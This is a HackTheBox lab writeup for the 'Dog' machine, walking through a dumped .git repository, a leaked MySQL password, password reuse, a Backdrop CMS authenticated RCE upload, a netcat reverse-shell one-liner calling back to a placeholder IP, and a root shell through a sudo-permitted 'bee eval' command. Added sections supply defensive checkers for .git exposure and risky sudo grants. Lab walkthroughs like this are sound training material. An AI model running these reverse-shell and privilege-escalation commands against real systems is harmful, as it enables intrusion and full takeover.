
robeeds

Cybersecurity,  HackTheBox,  Privilege Escalation,  Linux

HackTheBox | Dog [Easy] Writeup

Author

robeeds


Machine Information

IP Address: 10.10.11.58


Guide

Update hosts file

```bash
vim /etc/hosts
```
Hosts File HTB Dog


Run Nmap Scan (Quick)

```bash
sudo nmap -sS -sV 10.10.11.68 --stats-every=5s
```

Results

Nmap results HTB Dog


Visit Webpage

HTB Dog Landing Page

Run Ffuf to view directories

```bash
ffuf -w /usr/share/wordlists/common.txt:FUZZ -u http://dog.htb/FUZZ -ic
```

Results

Ffuf results HTB Dog

There is an exposed Git repository (a reachable `.git` directory under the web root). This means we will be able to reconstruct the site's source and view its development history.
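For anyone checking their own site for the exposure found above, the following is an added example (not code from the writeup): it fetches the two files a tool such as git-dumper needs first, `.git/HEAD` and `.git/config`, and only reports exposure when the body really looks like a Git file, so catch-all 200 pages are not mistaken for a leak. The `example.test` responses are constructed stand-ins for a live server.

```python
"""Check whether a web root exposes its .git directory (added example)."""
import re
import urllib.error
import urllib.request
from typing import Callable, Dict, Optional

# A genuine .git/HEAD is either a symbolic ref or a bare 40-hex commit id.
HEAD_RE = re.compile(r"^(ref: refs/\S+|[0-9a-f]{40})\s*$")

Fetcher = Callable[[str], Optional[str]]  # url -> body, or None when not HTTP 200


def looks_like_git_head(body: Optional[str]) -> bool:
    """True only for a real HEAD file, never for an HTML error or SPA page."""
    if body is None:
        return False
    return HEAD_RE.match(body.strip()) is not None


def check_git_exposure(base_url: str, fetch: Fetcher) -> Dict[str, bool]:
    """Probe HEAD and config and report which of them is readable."""
    base = base_url.rstrip("/")
    head = fetch(f"{base}/.git/HEAD")
    config = fetch(f"{base}/.git/config")
    return {
        "head_exposed": looks_like_git_head(head),
        "config_exposed": bool(config and "[core]" in config),
    }


def http_fetch(url: str, timeout: float = 5.0) -> Optional[str]:
    """Real fetcher for your own hosts: body on HTTP 200, otherwise None."""
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return resp.read().decode("utf-8", "replace")
    except (urllib.error.URLError, ValueError):
        return None


# Constructed responses standing in for a vulnerable server (runs offline).
SAMPLE_SITE = {
    "http://example.test/.git/HEAD": "ref: refs/heads/master\n",
    "http://example.test/.git/config": "[core]\n\trepositoryformatversion = 0\n",
}


def sample_fetch(url: str) -> Optional[str]:
    return SAMPLE_SITE.get(url)


if __name__ == "__main__":
    print(check_git_exposure("http://example.test", sample_fetch))
```

The fix on the server side is to deny every request whose path contains `/.git` (for example an Apache `<DirectoryMatch "/\.git">` with `Require all denied`), or not to deploy the repository metadata into the web root at all.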


Download Git-Dumper

```bash
pipx install git-dumper
```

Run Git-Dumper on Dog

```bash
git-dumper http://dog.htb/ git_dump
```

Change into the git_dump folder

```bash
cd git_dump
```

Listing current directory

Git dump HTB Dog


There is a settings.php file; let's view its contents.

MySQL server password HTB Dog

Here we have credentials for the root user of the MySQL server.

```text
root:BackDropJ2024DS2024
```

Let's check the Git logs

```bash
git log
```
Git log HTB Dog

Git checkout using the commit id.

Git checkout HTB Dog

Now, let's do a quick scan for any files that contain account information with the domain 'dog.htb'.

Grep for domain users HTB Dog

We have more usernames and email accounts we could possibly use to log into the website.

Login Page HTB Dog

Trying Tiffany's email and the MySQL password lets us log into the dashboard.

HTB Dog Dashboard

Checking User Accounts page

HTB Dog Users

Take a mental note of this for later. Let's continue looking around for any important information.

Backdrop Version HTB Dog

Let's see if there are any exploits we can run on this.

```bash
searchsploit backdrop
```
Searchsploit results for Backdrop HTB Dog

Let's go ahead and gather some more information about the exploit whose version matches the machine's Backdrop instance.


Remote Code Execution

After some light research, I came across this.

Summary of how this exploit works: An authenticated user that has permissions to upload modules manually can maliciously upload PHP code to establish a reverse shell, ultimately leading up to remote code execution.

We already have authenticated ourselves as Tiffany, and looking around further, there is a module upload page.

Module installation page HTB Dog

Before we continue, let's create our first attempt at exploiting this box.

Copy the Backdrop 1.27.1 Authenticated RCE exploit

```bash
cp /usr/share/exploitdb/exploits/php/webapps/52021.py .
```

Run the Python script

```bash
python 52021.py http://dog.
```
Exploit Output HTB Dog

The module was saved as a zip file, but we saw earlier that there wasn't a zip file extension installed. Let's see what file extensions are allowed.

From the browser, click on Manual Installation > Upload a module, theme, or layout archive to install.

It seems that tar, tgz, gz, and bz2 files are allowed. Let's go ahead and recompress the module to be uploaded. There will be a shell folder we will compress with the tar format.

```bash
tar -cf exploit.tar shell
```

Now, let's upload this file to the site, and visit its link.

Web page user shell HTB Dog

We have a reverse shell from the browser, but I'd like to make this a bit more stable. Let's open a listening port with netcat. In another terminal tab,

```bash
nc -lvnp 6666
```

And in our "shell" in the browser,

```bash
python3 -c 'import os; os.system("rm -f /tmp/f;mknod /tmp/f p; cat /tmp/f|/bin/sh -i 2>&1|nc <YOUR_IP_HERE> 6666 >/tmp/f")'
```
Unstable Shell HTB Dog

This shell is still unstable, so let's go ahead and make our terminal experience more tolerable.

Spawn a bash shell through Python

```bash
python3 -c 'import pty; pty.spawn("/bin/bash")'
```

Send this to the background (Ctrl+Z), then

```bash
stty raw -echo; fg
```

Lastly, set the $TERM variable to xterm

```bash
export TERM=xterm
```

Now, we can see our pwd, clear our terminal, and use arrow keys.


One thing I like to do is to check the home directory

```bash
ls -la /home
```
Home directory HTB Dog

There are two users, jobert and johncusack. Listing their directories shows me that user.txt exists under johncusack, but I can't seem to view the majority of files with cat.


Getting Stuck

I did some thorough investigation all around the file system, seeing if there was anything of use. I found that there was a utility called "Bee" under the root directory '/' (note that this is different from '/root'). I honestly got stuck here, running linpeas and continuing to look around for any ways to escalate my privileges. My last choice was just to reuse the MySQL password from earlier on some more of the accounts, which was successful.


Getting the User Flag

I SSH'ed into johncusack's account.

```bash
ssh johncusack@dog.htb
```

Now, we're able to view the User flag.

```bash
cat user.txt
```

Run sudo -l to view permissions

```bash
sudo -l
```

Re-enter the MySQL password, and we see the following.

Sudo permissions HTB Dog

Getting the Root Flag

We see that johncusack has permission to run the Bee command with sudo, without a password. Having previously viewed its usage, we can actually use this to spawn a shell as root.

```bash
sudo bee --root=/var/www/html eval 'system("/bin/bash");'
```
Root Shell HTB Dog
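From the administrator's side, the grant above is the thing to catch before anyone reaches it: a sudo rule for a tool that can evaluate arbitrary code is equivalent to a root shell. The following is an added example (not from the writeup) that parses `sudo -l` output and flags such entries; the sample output is constructed, since the writeup shows it only as a screenshot, and the binary list is my own assumption.

```python
"""Flag sudo grants that hand out code execution (added example)."""
import re
from typing import List, NamedTuple


class SudoEntry(NamedTuple):
    runas: str
    nopasswd: bool
    command: str


# Binaries whose normal use includes evaluating arbitrary code (assumed list);
# 'bee' is the Backdrop CLI from the writeup, with its 'eval' subcommand.
CODE_EXEC_BINARIES = {"bee", "bash", "sh", "php", "python3", "perl"}

# One "(runas) TAG: command" line as printed by sudo -l.
ENTRY_RE = re.compile(
    r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>.+?)\s*$"
)


def parse_sudo_l(output: str) -> List[SudoEntry]:
    """Parse the 'may run the following commands' section of sudo -l."""
    entries = []
    for line in output.splitlines():
        m = ENTRY_RE.match(line)
        if m:  # header lines such as 'Matching Defaults entries' do not match
            entries.append(SudoEntry(m.group("runas").strip(),
                                     "NOPASSWD" in m.group("tags"),
                                     m.group("cmd")))
    return entries


def risky_entries(entries: List[SudoEntry]) -> List[SudoEntry]:
    """Entries that need no password AND run ALL or a code-executing binary."""
    out = []
    for e in entries:
        binary = e.command.split()[0].rsplit("/", 1)[-1]
        if e.nopasswd and (e.command == "ALL" or binary in CODE_EXEC_BINARIES):
            out.append(e)
    return out


# Constructed sample modelled on the writeup's finding.
SAMPLE_OUTPUT = """Matching Defaults entries for johncusack on dog:
    env_reset, mail_badpass

User johncusack may run the following commands on dog:
    (ALL : ALL) NOPASSWD: /usr/local/bin/bee
    (root) /usr/bin/systemctl restart apache2
"""

if __name__ == "__main__":
    for e in risky_entries(parse_sudo_l(SAMPLE_OUTPUT)):
        print("RISK:", e)
```

Remediation is to drop the rule or restrict it to specific, non-evaluating subcommands with `sudoers` argument matching, and to check the user's service credentials are not reused as the OS password.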

Now, we can view the directory and read the contents of root.txt.

```bash
cat /root/root.txt
```

